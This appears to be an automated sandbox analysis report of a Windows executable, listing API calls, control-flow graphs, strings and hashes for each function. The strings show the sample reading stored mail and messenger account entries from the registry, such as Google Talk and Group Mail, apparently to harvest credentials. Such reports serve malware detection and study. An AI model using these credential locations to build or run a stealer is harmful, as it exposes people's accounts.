                                                                                                                                                                • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2012582556-3916222277
                                                                                                                                                                • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                                                                                • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                                                                • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                                                                                • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 344 4038bf-4038dd _mbscpy call 4023e5 342->344 343->344 345 4038a4-4038bc sprintf 343->345 344->334 345->344
                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 004037EB
                                                                                                                                                                • memset.MSVCRT ref: 004037FF
                                                                                                                                                                  • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                                  • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                                                                                                • strchr.MSVCRT ref: 0040386E
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040388B
                                                                                                                                                                • strlen.MSVCRT ref: 00403897
                                                                                                                                                                • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                                • _mbscpy.MSVCRT ref: 004038CD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                • String ID: %s@yahoo.com
                                                                                                                                                                • API String ID: 317221925-3288273942
                                                                                                                                                                • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                                                                                • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                                                                • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                                                                                • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 347 404a99-404ac2 LoadLibraryA 348 404ac4-404ad2 GetProcAddress 347->348 349 404aec-404af4 347->349 350 404ad4-404ad8 348->350 351 404add-404ae6 FreeLibrary 348->351 354 404af5-404afa 349->354 355 404adb 350->355 351->349 352 404ae8-404aea 351->352 352->354 356 404b13-404b17 354->356 357 404afc-404b12 MessageBoxA 354->357 355->351
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(comctl32.dll,76DC0A60,?,00000000,?,?,?,0040CF60,76DC0A60), ref: 00404AB8
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76DC0A60), ref: 00404ADE
                                                                                                                                                                • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                                                                • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                                                                                • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 358 4034e4-403544 memset * 2 call 410b1e 361 403580-403582 358->361 362 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 358->362 362->361
                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 00403504
                                                                                                                                                                • memset.MSVCRT ref: 0040351A
                                                                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00403555
                                                                                                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                • API String ID: 3071782539-966475738
                                                                                                                                                                • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                                                                                • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                                • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                                                                                • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 367 40ccd7-40cd06 ??2@YAPAXI@Z 368 40cd08-40cd0d 367->368 369 40cd0f 367->369 370 40cd11-40cd24 ??2@YAPAXI@Z 368->370 369->370 371 40cd26-40cd2d call 404025 370->371 372 40cd2f 370->372 374 40cd31-40cd57 371->374 372->374 376 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 374->376 377 40cd59-40cd60 DeleteObject 374->377 377->376
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2054149589-0
                                                                                                                                                                • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                                                                • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                                • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                                                                • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 384 44b40e-44b415 GetModuleHandleA 385 44b455 384->385 386 44b417-44b426 call 44b42b 384->386 388 44b457-44b45b 385->388 396 44b48d 386->396 397 44b428-44b433 GetProcAddress 386->397 390 44b45d-44b465 GetModuleHandleA 388->390 391 44b49a call 44b49f 388->391 394 44b467-44b46f 390->394 394->394 395 44b471-44b474 394->395 395->388 398 44b476-44b478 395->398 399 44b48e-44b496 396->399 397->385 400 44b435-44b442 VirtualProtect 397->400 401 44b47e-44b486 398->401 402 44b47a-44b47c 398->402 408 44b498 399->408 404 44b454 400->404 405 44b444-44b452 VirtualProtect 400->405 406 44b487-44b488 GetProcAddress 401->406 402->406 404->385 405->404 406->396 408->395
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                  • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                  • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                  • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2099061454-0
                                                                                                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                                  • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                  • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                • memset.MSVCRT ref: 00408620
                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                • memset.MSVCRT ref: 00408671
                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                                                Strings
                                                                                                                                                                • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                                                • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                • API String ID: 1366857005-1079885057
                                                                                                                                                                • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                                                                • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                                                • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                                                                • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 432 40ba28-40ba3a 433 40ba87-40ba9b call 406c62 432->433 434 40ba3c-40ba52 call 407e20 _mbsicmp 432->434 456 40ba9d call 4107f1 433->456 457 40ba9d call 404734 433->457 458 40ba9d call 404785 433->458 459 40ba9d call 403c16 433->459 460 40ba9d call 410a9c 433->460 439 40ba54-40ba6d call 407e20 434->439 440 40ba7b-40ba85 434->440 446 40ba74 439->446 447 40ba6f-40ba72 439->447 440->433 440->434 442 40baa0-40bab3 call 407e30 448 40bab5-40bac1 442->448 449 40bafa-40bb09 SetCursor 442->449 450 40ba75-40ba76 call 40b5e5 446->450 447->450 451 40bac3-40bace 448->451 452 40bad8-40baf7 qsort 448->452 450->440 451->452 452->449 456->442 457->442 458->442 459->442 460->442
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                                • API String ID: 882979914-1578091866
                                                                                                                                                                • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                                                                • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                                                • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                                                                • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                  • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                                                                  • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                  • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                  • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2099061454-0
                                                                                                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2152742572-0
                                                                                                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,76DC0A60,?,00000000), ref: 00410D1C
                                                                                                                                                                  • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                • memset.MSVCRT ref: 00410E10
                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00410E87
                                                                                                                                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                Strings
                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                • API String ID: 889583718-2036018995
                                                                                                                                                                • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                                                                • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                                • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                                                                • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3473537107-0
                                                                                                                                                                • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                                                                • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 004109F7
                                                                                                                                                                  • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                  • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                                                                                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                                • memset.MSVCRT ref: 00410A32
                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3143880245-0
                                                                                                                                                                • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                                                                • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                                • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                                                                • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                                • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                                                • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                                • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                                • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                                                                • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
